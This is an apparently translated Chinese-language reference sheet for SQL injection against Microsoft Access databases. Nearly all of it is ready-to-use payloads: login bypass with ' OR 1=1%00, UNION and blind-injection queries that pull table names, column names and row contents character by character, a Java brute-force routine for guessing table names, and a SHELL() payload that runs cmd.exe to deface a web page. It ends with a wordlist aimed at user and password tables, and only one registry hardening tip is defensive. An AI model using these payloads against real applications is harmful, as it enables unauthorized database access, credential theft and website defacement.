Access SQL注入參考
|
描述 |
SQL查詢及註釋 |
註釋符 |
Access中沒有專門的註釋符號.因此"/*", "--"和"#"都沒法使用.但是可以使用空字符"NULL"(%00)代替:
|
語法錯誤信息 |
"[Microsoft][Driver ODBC Microsoft Access]" |
多句執行 |
不支持. |
聯合查詢 |
Access支持聯合查詢,UNION後的FROM關鍵字必須使用一個已經存在的表名. |
附屬查詢 |
Access支持附屬查詢(例如:"TOP 1"用來返回第一行的內容) :
- ' AND (SELECT TOP 1 'someData' FROM validTableName)%00
|
LIMIT支持 |
LIMIT不被支持,但是在查詢中可以聲明"TOP N"來限制返回內容的行數:
- ' UNION SELECT
TOP 3 AttrName FROM validTableName%00 : 這條語句返回(前)3 行.
|
讓查詢返回0行 |
在腳本在返回的HTML結果中只顯示第一個查詢的結果的時候非常有用:
- ' AND 1=0 UNION SELECT AttrName1,AttrName2 FROM validTableName%00
|
字符串連接 |
不支持CONCAT()函數. 可以使用"&"或"+"操作來倆接兩個字符串.在使用的時侯必須對這兩個操作符進行URLencode編碼:
|
子字符串 |
MID()函數:
- ' UNION SELECT
MID('abcd',1,1) FROM validTableName%00 : 返回 "a"
- ' UNION SELECT
MID('abcd',2,1) FROM validTableName%00 : 返回 "b"
|
字符串長度 |
LEN()函數:
- ' UNION SELECT
LEN('1234') FROM validTableName%00 : 返回 4
|
暴WEB路徑 |
可以通過對一個不存在的庫進行SELECT操作.Access將會迴應一條包含有完整路徑的錯誤信息.:
- ' UNION SELECT 1
FROM ThisIsAFakeName.FakeTable%00
|
取字符的ASCII值 |
ASC()函數:
- ' UNION SELECT
ASC('A') FROM ValidTable%00 :返回65 ('A'的ASCII值)
|
ASCII值轉換爲字符 |
CHR()函數:
- ' UNION SELECT
CHR(65) FROM validTableName%00 : 返回 'A'
|
IF語句 |
可以使用IIF()函數. 語法 : IIF(condition, true, false) :
- ' UNION SELECT
IIF(1=1, 'a', 'b') FROM validTableName%00 : 返回 'a'
|
時間接口 |
不存在類似BENCHMARK()或SLEEP()的函數,但是可以使用大量(高負載)的查詢來達到這個效果.點擊這裏查看參考. |
驗證文件是否存在 |
在注入的時候使用:
|
表名猜解 |
這裏有一個簡單的猜解access表名的java代碼.我寫他是爲了更好的解釋猜解表名的原理:
static private String columnErrorMessage = "...";
static private String accessError = "...";
[...]
public String bruteTableName(Request r) { // 0
String resp = new String();
String[] table = { "tab_name1", "tab_name2", ..., "tab_nameN" }; // 1
for(int i = 0; i < table.length; i++) {
resp = sendInjection(r, " ' UNION SELECT 1 FROM " + table[i] + "%00"); // 2
if(resp.contains(columnErrorMessage) || !resp.contains(accessError)) // 3
return table[i];
}
return null;
}
|
bruteTableName()的參數是一個名爲"Request"的對象(見註釋0).這個例子靠
sendInjection() (見註釋2)嘗試檢測查詢:
- ' UNION
SELECT 1 FROM table[i]%00
table[i]是表名列表中的一個元素(見註釋1). 你能在這篇文章的末尾找到一個小的表名列表.在註釋2處,
sendInjection()函數返回提交注入代碼後的迴應html代碼.如果resp包含
columnErrorMessage 字符串(見註釋3),恭喜你,你找到了一個存在的表. columnErrorMessage 是在UNION查詢中使用了和主查詢不同的卷數而返回的錯誤信息.如果表不存在,返回的信息將是表不存在,而不是卷的數目錯誤.
|
列名猜解 |
需要一個已知的表名和主查詢的列的數目:
- ' UNION SELECT
fieldName[j],1,1,1 FROM validTableName%00
你可以將上面的例子修改一下(將table改爲fieldname),如果表不存在,將會返回一個列不存在的錯誤信息.
|
繞過登陸 |
用戶名: ' OR 1=1%00 (or
" OR 1=1%00)
密碼: (留空)
|
列名枚舉 |
按語
: 此原理已經在JBoss(一個使用Access存在漏洞的.jsp腳本)上測試通過 ,但是不敢保證在其他的環境下同樣可用.
通常情況下,如果存在SQL注入漏洞,當你在URL參數後加一個"'"後,你將會得到一些錯誤信息,例如:
- Error (...) syntax (...) query (...) : " Id=0' "
從這個信息可以得出當前表存在一個列"ID".通常程序員會使用同樣的URL參數,列名及表名.當你知道一個參數後,就可以通過mssql來枚舉其他表名和列名:
現在你將獲得一個新的錯誤信息,它包含了另一個新的列名.你可以繼續像這樣枚舉其他的表名:
- ' GROUP BY Id, SecondAttrName, ...%00
直到獲取到所有的表名.
|
與操作系統的交互
|
這些函數默認不可用
|
安全提示 |
可以通過修改註冊表來鎖定一些受爭議的函數的使用(比如SHELL(),等等...):
- \\HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\engines\SandboxMode
它的默認值是2,因此這些函數默認不可用.在下面我將會向你介紹當註冊表的值被設置爲0的情況.
|
獲取當前目錄 |
需要一個已知的表名和主查詢的列的數目:
- ' UNION SELECT
CurDir(),1,1 FROM validTableName%00
|
執行系統命令 |
SHELL()函數可以用來執行系統命令:
- ' AND SHELL('cmd.exe /c echo owned > c:\path\name\index.html')%00
|
Access的系統表
|
這些系統表默認不可訪問
|
MSysAccessXML |
表中包含的列:
- Id
- LValue
- ObjectGuid
- ObjectName
- Property
- Value
|
MSysACEs |
表中包含的列:
- ACM
- FInheritable
- ObjectId
- SID
|
MSysObjects |
這裏可以獲得表名:
- Connect
- Database
- DataCreate
- DataUpdate
- Flags
- ForeignName
- Id
- Lv
- LxExtra
- LvModule
- LvProp
- Name
- Owner
- ParentId
- RmtInfoLong
- RmtInfoShort
- Type
這條查詢可以用來獲得數據庫中的表名:
- ' UNION
SELECT Name FROM MSysObjects WHERE Type = 1%00
|
Access盲注(這些步驟用來猜解表的內容) |
第一步:猜解表名 |
你可以使用下面提供的字典來猜解表名.注入查詢語句:
- ' AND (SELECT TOP 1 1 FROM TableNameToBruteforce[i])%00
在提交注入查詢語句後,如果你獲得的HTML返回和正常頁面一樣,則表存在.(因爲 "AND 1"對查詢沒有任何影響).
|
第二步: 猜解列名
|
在指導表名的情況下,使用如下查詢:
- ' AND (SELECT TOP 1 FieldNameToBruteForce[j] FROM table)%00
用和第一步同樣的方法判斷列是否存在.
|
第三步:猜解內容的行數 |
在進一步的行動中,你必須知道表中內容的行數. 它在下面的查詢中將被用作"TAB_LEN"變量:
- ' AND IIF((SELECT COUNT(*) FROM validTableName) = X, 1, 0)%00
這裏的"X" 是大於0的任意值.可以使用老方法來判斷"X"的準確值.
|
第四步:猜解內容的長度 |
你能通過以下語句獲取"ATTRIB"列的第一行的內容長度:
可以通過以下語句猜解到 "ATTRIB"列中第二行到第TAB_LEN行的內容的長度 (這裏N的值在2和TAB_LEN(在前面已經獲得)之間) :
"KKK"
爲大於0的任意值,使用ATTRIB<>'valueXXX'的原因是我們必須選擇一個特定的行來猜解.我想到的方法是將之前得到的"TOP N"行的值排除掉,然後剩下的行就是正在猜解的行.當然,這裏有一個前提"ATTRIB"必須是主鍵.這裏有一個例子:
A1 |
A2 |
A3 |
1111 |
2222 |
3333 |
0000 |
4444 |
oooo |
aaaa |
bbbb |
cccc |
可以這樣獲取第一行的所有內容的長度:
-
' AND IIF((SELECT TOP 1 LEN(A1) FROM Table) = KKK, 1, 0)%00
-
' AND IIF((SELECT TOP 1 LEN(A2) FROM Table) = KKK, 1, 0)%00
-
' AND IIF((SELECT TOP 1 LEN(A3) FROM Table) = KKK, 1, 0)%00
然後就可以這樣獲取第二行的內容的長度(假設A1爲表的主鍵) :
-
' AND IIF((SELECT TOP 2 LEN(A1) FROM Table WHERE
A1 <>'1111') = KKK, 1, 0)%00
-
' AND IIF((SELECT TOP 2 LEN(A2) FROM Table WHERE
A1 <> '1111') = KKK, 1, 0)%00
-
' AND IIF((SELECT TOP 2 LEN(A3) FROM Table WHERE
A1 <> '1111') = KKK, 1, 0)%00
第三行也一樣:
-
' AND IIF((SELECT TOP 3 LEN(A1) FROM Table WHERE
A1 <>'1111' AND A1 <> '0000') = KKK, 1, 0)%00
-
' AND IIF((SELECT TOP 3 LEN(A2) FROM Table WHERE
A1 <> '1111' AND A1 <> '0000') = KKK, 1, 0)%00
-
' AND IIF((SELECT TOP 3 LEN(A3) FROM Table WHERE
A1 <> '1111' AND A1 <> '0000') = KKK, 1, 0)%00
很明顯,在猜解第一行以後的內容的長度(第2到第TAB_LEN行),你必須得到之前所有行的內容(你需要把它放在WHERE後).
|
第五步:猜解內容 |
假設攻擊者已經知道了表和列名,他將使用這樣的查詢:
-
' AND IIF((SELECT TOP N MID(ATTRIBxxx, XXX, 1) FROM validTableName WHERE ATT_key <>'value1' AND ATT_key
<>'value2' ... etc ... ) = CHAR(YYY), 1, 0)%00
"N"是要猜解的行,
"XXX"是 "ATTRIBxxx"的第X個字節,
"ATT_key"是表的的主鍵"YYY"是一個0到255之間的數.(它代表着一個字符的ASCII碼).這裏我們任然要使用前面提到的方法猜解其他行的內容.
|
表名/列名(字典) |
表名/列名(字典) |
這裏是一個小的表/列名樣本字典,在猜解中也許用的到:
-
account,accnts, accnt, user_id, members, usrs, usr2, accounts, admin, admins,adminlogin, auth, authenticate, authentication, account, access;
-
customers, customer, config, conf, cfg;
-
hash;
-
login, logout, loginout, log;
-
member, memberid;
-
password, pass_hash, pass, passwd, passw, pword, pwrd, pwd;
-
store, store1, store2, store3, store4, setting;
-
username,name, user, user_name, user_username, uname, user_uname, usern,user_usern, un, user_un, usrnm, user_usrnm, usr, usernm, user_usernm,user_nm, user_password, userpass,
user_pass, , user_pword, user_passw,user_pwrd, user_pwd, user_passwd;
|